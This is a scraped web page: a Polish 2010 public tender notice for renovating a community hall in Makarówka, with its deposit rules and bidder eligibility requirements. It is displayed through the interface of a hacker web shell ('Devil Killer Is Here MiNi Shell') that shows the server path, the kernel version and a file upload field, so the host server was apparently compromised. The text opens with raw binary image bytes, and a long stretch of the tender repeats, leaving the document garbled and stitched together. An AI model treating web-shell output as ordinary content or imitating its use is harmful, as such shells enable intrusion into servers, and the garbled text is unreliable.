JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24006-N-2010.html

<p class="kh_header"><b>Huszlew: Remont wielofunkcyjnej świetlicy w miejscowości Makarówka wraz z zakupem wyposażenia</b><br>
<b>Numer ogłoszenia: 24006 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminna Biblioteka Publiczna w Huszlewie , Huszlew 77, 08-206 Huszlew, woj. mazowieckie, tel. 83 3580165, faks 83 3580108.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wielofunkcyjnej świetlicy w miejscowości Makarówka wraz z zakupem wyposażenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  wielofunkcyjnej świetlicy w miejscowości Makarówka wraz z zakupem wyposażenia   

Budynek świetlicy zlokalizowany jest na   działce  ewidencyjnej   nr 573 .
Zamówienie realizowane w ramach działania Odnowa i Rozwój Wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.

Roboty budowlane stanowią 94 % zamówienia , dostawy wyposażenia  stanowią
 6 % zamówienia , taka proporcja winna być  utrzymana w ofercie wykonawcy.

2.Zakres przedmiotu zamówienia :

 2.1/ wykonanie robót budowlanych polegających na remoncie budynku świetlicy 

- powierzchnia zabudowy - 465,00 m 2
-powierzchnia użytkowa   - 663,90 m 2 
-kubatura                           - 3150,00 m 2

2/Zakres robót budowlanych przewidzianych  dla  wykonania  remontu :
             -roboty murowane  i tynkarskie
             -wykonanie podłóg i posadzek
             -stolarka okienna i drzwiowa
             -roboty malarskie
             -urządzenia sanitarne
             -elewacje
             -elementy zewnętrzne
             -plac postojowy
             -instalacje centralnego ogrzewania
             -instalacja kotłowni węglowej 
             -instalacje wentylacji mechanicznej
             -instalacje ciepła technologicznego

wraz z zabezpieczenia obsługi geodezyjnej  z inwentaryzacją powykonawczą.
.
Szczegółowy opis przedmiotu zamówienia określają :
a/przedmiar robót załącznik nr  8 do SIWZ .
b/projekt budowlano -wykonawczy dla instalacji centralnego ogrzewania wraz z kotłownią na potrzeby całego obiektu , instalacji wentylacji mechanicznej na potrzeby świetlicy . załącznik nr  9 do SIWZ
c/Nazwy i kody stosowane we Wspólnym Słowniku Zamówień
Kod CPV 45.00.00.00- 7,  45.40.00.00- 1,  45 .30 .00 .00 - 0 

2.2 dostawa wyposażenia świetlicy .
Szczegółowy zakres dostawy ,ilość, wymagania i parametry określone w załączniku nr 10 do SIWZ 
Wymagana  jest dostawa  wyposażenia fabrycznie nowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Ustala się wadium na całość przedmiotu zamówienia w wysokości  6 000 zł.
/słownie  : sześć tysięcy  złotych / 
2.Wadium może być wnoszone w jednej lub kilku następujących formach :
1)pieniądzu
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3)gwarancjach bankowych
4)gwarancjach ubezpieczeniowych,
 5)poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt.2  ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 109,poz.1158, z późn. zm.)
3. W przypadku wnoszenia wadium w pieniądzu należy je wpłacić przelewem   na rachunek bankowy BS o/Huszlew 208038 0007 0000 1111 2000 0100
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5.Wadium wnosi się przed  upływem terminu  składania ofert .Przed tym terminem należy dostarczyć dokument potwierdzający wniesienie wadium , oryginał  lub kopię polecenia przelewu , oryginał dokumentu będącego każą inną formą wadium.
O uznaniu przez Zamawiającego , że wadium w pieniądzu zostało wniesione w terminie , decyduje termin uznania na rachunku bankowym Zamawiającego  przed terminem wyznaczonym na składanie ofert. 
6. Wadium wniesione w pieniądzu  zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane ,pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę . 
7.Polisa ,poręczenie gwarancja lub inny dokument stanowiący formę wadium winny zawierać stwierdzenie , że na pierwsze pisemne żądanie Zamawiającego -wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia - następuje bezwarunkowa jego wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela .
8. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania , z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza ,z zastrzeżeniem ust.  12
9.Wykonawcy , którego oferta została wybrana jako najkorzystniejsza , Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz po wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano .
10.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy , który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę , któremu zwrócono wadium na podstawie ust. 8 , jeżeli  w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza.
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12. Zamawiający zatrzymuje wadium wraz z odsetkami ,jeżeli Wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 Ustawy nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust  1  Ustawy, lub pełnomocnictw .chyba ,że udowodni ,że wynika to z przyczyn nie leżących po jego stronie.
13. Zamawiający zatrzymuje wadium raz z odsetkami ,jeżeli Wykonawca , którego oferta została wybrana   :
1) odmówił podpisania umowy w spawie zamówienia publicznego na warunkach określonych w ofercie 
2 ) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy 
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy ,którzy nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1  i ust. 2 Ustawy .

1.1.Na potwierdzenie tego warunku Wykonawca winien przedstawić następujące dokumenty  lub oświadczenia:

 a) oświadczenie  o braku podstaw do wykluczenia    zał.  nr 2  do SIWZ

b/ aktualny odpis  z  właściwego rejestru  , jeżeli odrębne przepisy wymagają wpisu do rejestru, w  celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt. 2 Ustawy ,wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 Ustawy
 -osoby  fizyczne prowadzące zarejestrowaną działalność gospodarczą  z wykorzystaniem  wzoru - załącznik nr 2  A do SIWZ.

c/ aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłaceniem podatków , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem składania ofert.

d)aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłaceniem  składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia , ze uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych  płatności lub wstrzymanie w całości decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

e/ dowód wniesienia wadium 

1.2 . Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r.  w sprawie rodzaju dokumentów ,jakich może żądać zamawiający od wykonawcy oraz form , w jakich te dokumenty mogą być składane /Dz .U. Nr  Nr 226 poz. 1817 / 

1./Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ,  zamiast dokumentów o  których mowa w  ust. 1.1. punkt  b,c,d  SIWZ składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę lub miejsce zamieszkania , potwierdzające odpowiednio , że

a/nie otwarto jego likwidacji ani nie ogłoszono upadłości,

b/nie zalega z uiszczaniem podatków, opłat ,składek na ubezpieczenie społeczne i zdrowotne albo że  uzyskał przewidziane prawem zwolnienie ,odroczenie lub rozłożenie na raty zaległości płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

c/nie orzeczono wobec niego zakazu ubiegania się o  zamówienie 

2./Dokumenty o których mowa w  ust. 1/. lit a,c  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert . 
Dokument o którym mowa w ust. 1/ lit b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

3/Jeżeli w miejscu zamieszkania osoby lub w kraju , w którym Wykonawca ma siedzibę lub miejsce zamieszkania , nie wydaje się dokumentów ,o których mowa w ust. 1 , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem , właściwym organem sądowym , administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania .Przepisu ust. 2/ stosuje się odpowiednio.
 
4/. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.

W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia oświadczenie i  dokumenty składane są przez każdego Wykonawcę  .

2. O zamówienie mogą ubiegać się Wykonawcy ,którzy spełniają warunki  stosownie do art.  art. 22 ust. 1 Ustawy , dotyczące : 

1.posiadania  uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania 
2.posiadania wiedzy i doświadczenia 
3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.sytuacji ekonomicznej  i finansowej 

2.1  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki : 

2.1.1. Złożą oświadczenie o spełnianiu warunków  udziału w postępowaniu- zał nr 3 do SIWZ

2.1.2 Zrealizowali co najmniej 1 zamówienie  o porównywalnym zakresie , w okresie ostatnich 5 lat przed dniem  wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy , w tym okresie i o wartości nie mniejszej niż 300 000 PLN  a roboty wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
Spełnieniem tego warunku będzie przedstawienie  wykonania prawidłowo ukończonego  1 zamówienia o wartości nie mniejszej niż 300 000 PLN .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie . 

2.1.3.dysponują osobami przewidzianymi do kierowania poszczególnymi robotami budowlanymi i  posiadającymi odpowiednie uprawnienia do pełnienia  samodzielnych funkcji  technicznych w budownictwie 

-jedna osoba do kierowania robotami budowlanymi  z uprawnieniami  ogólno -budowlanymi   
- jedna osoba z uprawnieniami do kierowania robotami budowlanymi w zakresie sieci i instalacji sanitarnych 
-jedna osoba uprawnieniami do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Spełnieniem tego warunku będzie  wykazanie tych osób. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie . 

2.1.4 posiadają  środki finansowe lub zdolność kredytową  w wysokości  nie mniejszej niż 200 000 PLN .
Spełnieniem tego warunku będzie posiadanie środków finansowych lub zdolności kredytowej w wymaganej wysokości .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie.

 2.1.5.  posiadają opłaconą  polisę  ubezpieczeniową , a w przypadku jej braku ,innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimalną  100 000 PLN i na okres trwania zamówienia. W razie gdy  ubezpieczenie obejmuje okres krótszy , Wykonawca  składa zobowiązanie do zawarcia nowego  ubezpieczenia , na czas co najmniej do końca trwania umowy na wykonanie zamówienia .
Spełnieniem tego warunku będzie posiadania opłaconej polisy  ubezpieczeniowej lub innego dokumenty potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnej z przedmiotem niniejszego zamówienia na kwotę minimalną 100 000 PLN a ubezpieczenie obejmuje okres do końca trwania umowy .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten   każdy Wykonawca musi spełnić oddzielnie .

3.Wykonawca może polegać na wiedzy i doświadczeniu ,potencjale technicznym ,osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie od charakteru prawnego łączących go z nimi stosunków .Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia ,w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania  mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 3. W celu wykazana spełnienia warunków udziału w postępowaniu  określonych w  ust. 2.1 każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty :

3.1.  oświadczenie o spełnianiu warunków - art. 22 ust. 1 Ustawy - zał nr 3 do SIWZ

3.2 Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku  wiedzy i doświadczenia , wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich  rodzaju i wartości ,daty i miejsca wykonania oraz  załączeniem dokumentu potwierdzającego , że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone .-zał. nr  4  do SIWZ

3.3.wykaz osób  ,które będą uczestniczyć w wykonywaniu zamówienia  do kierowania robotami budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego  do wykonywania zamówienia a także zakresu wykonywanych przez nie czynności  wraz z oświadczeniem ,że osoby wymienione w wykazie posiadają wymagane uprawnienia budowlane , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień , oraz informacji o podstawie dysponowania tymi osobami i pisemnego zobowiązania  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia ,jeżeli w wykazie Wykonawca wsadzał osoby, którymi będzie dysponował  - zał  nr  5 do SIWZ

3.4 informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej , w których Wykonawca posiada rachunek ,potwierdzającej wysokość posiadanych środków finansowych lub zdolność  kredytową  wykonawcy, wystawioną nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert 

3.5 opłaconej  polisy a w przypadku jej braku, innego dokumentu potwierdzającego ,że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia . 
W razie gdy ubezpieczenie obejmuje krótszy okres Wykonawca  składa zobowiązanie do zawarcia nowego  ubezpieczenia , na czas co najmniej do końca trwania umowy na wykonanie zamówienia .-zał. nr 6   do SIWZ

4.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia  albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego - zgodnie z postanowieniami art. 23 Ustawy. 
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem
 W przypadku wyboru oferty wykonawców ubiegających się wspólnie o udzielenie zamówienia Zamawiający przed zawarciem umowy zażąda umowy regulującej współpracę tych wykonawców. 

5.Ocena spełnienia warunków udziału w postępowaniu  zostanie dokonana według formuły ,, spełnia - nie spełnia ,,  w oparciu o informacje zawarte w dokumentach i oświadczeniach  wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty . Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie ,że Wykonawca spełnia wyżej wymienione warunki .

6.Wykonawcy którzy nie spełnią  opisanych warunków udziału w postępowaniu  i  nie wykażą braku podstaw  do wykluczenia a także w przypadku zaistnienia okoliczności o których mowa w art. 24 ust.2  Ustawy , zostaną z postępowania o udzielenie zamówienia publicznego wykluczeni ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. O zamówienie mogą ubiegać się Wykonawcy ,którzy nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1  i ust. 2 Ustawy .

1.1.Na potwierdzenie tego warunku Wykonawca winien przedstawić następujące dokumenty  lub oświadczenia:

 a) oświadczenie  o braku podstaw do wykluczenia    zał.  nr 2  do SIWZ

b/ aktualny odpis  z  właściwego rejestru  , jeżeli odrębne przepisy wymagają wpisu do rejestru, w  celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt. 2 Ustawy ,wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 Ustawy
 -osoby  fizyczne prowadzące zarejestrowaną działalność gospodarczą  z wykorzystaniem  wzoru - załącznik nr 2  A do SIWZ.

c/ aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłaceniem podatków , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem składania ofert.

d)aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłaceniem  składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia , ze uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych  płatności lub wstrzymanie w całości decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

e/ dowód wniesienia wadium 

1.2 . Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r.  w sprawie rodzaju dokumentów ,jakich może żądać zamawiający od wykonawcy oraz form , w jakich te dokumenty mogą być składane /Dz .U. Nr  Nr 226 poz. 1817 / 

1./Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ,  zamiast dokumentów o  których mowa w  ust. 1.1. punkt  b,c,d  SIWZ składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę lub miejsce zamieszkania , potwierdzające odpowiednio , że

a/nie otwarto jego likwidacji ani nie ogłoszono upadłości,

b/nie zalega z uiszczaniem podatków, opłat ,składek na ubezpieczenie społeczne i zdrowotne albo że  uzyskał przewidziane prawem zwolnienie ,odroczenie lub rozłożenie na raty zaległości płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

c/nie orzeczono wobec niego zakazu ubiegania się o  zamówienie 

2./Dokumenty o których mowa w  ust. 1/. lit a,c  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert . 
Dokument o którym mowa w ust. 1/ lit b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

3/Jeżeli w miejscu zamieszkania osoby lub w kraju , w którym Wykonawca ma siedzibę lub miejsce zamieszkania , nie wydaje się dokumentów ,o których mowa w ust. 1 , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem , właściwym organem sądowym , administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania .Przepisu ust. 2/ stosuje się odpowiednio.
 
4/. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.

W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia oświadczenie i  dokumenty składane są przez każdego Wykonawcę  .

2. O zamówienie mogą ubiegać się Wykonawcy ,którzy spełniają warunki  stosownie do art.  art. 22 ust. 1 Ustawy , dotyczące : 

1.posiadania  uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania 
2.posiadania wiedzy i doświadczenia 
3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.sytuacji ekonomicznej  i finansowej 

2.1  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki : 

2.1.1. Złożą oświadczenie o spełnianiu warunków  udziału w postępowaniu- zał nr 3 do SIWZ

2.1.2 Zrealizowali co najmniej 1 zamówienie  o porównywalnym zakresie , w okresie ostatnich 5 lat przed dniem  wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy , w tym okresie i o wartości nie mniejszej niż 300 000 PLN  a roboty wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
Spełnieniem tego warunku będzie przedstawienie  wykonania prawidłowo ukończonego  1 zamówienia o wartości nie mniejszej niż 300 000 PLN .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie . 

2.1.3.dysponują osobami przewidzianymi do kierowania poszczególnymi robotami budowlanymi i  posiadającymi odpowiednie uprawnienia do pełnienia  samodzielnych funkcji  technicznych w budownictwie 

-jedna osoba do kierowania robotami budowlanymi  z uprawnieniami  ogólno -budowlanymi   
- jedna osoba z uprawnieniami do kierowania robotami budowlanymi w zakresie sieci i instalacji sanitarnych 
-jedna osoba uprawnieniami do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Spełnieniem tego warunku będzie  wykazanie tych osób. 
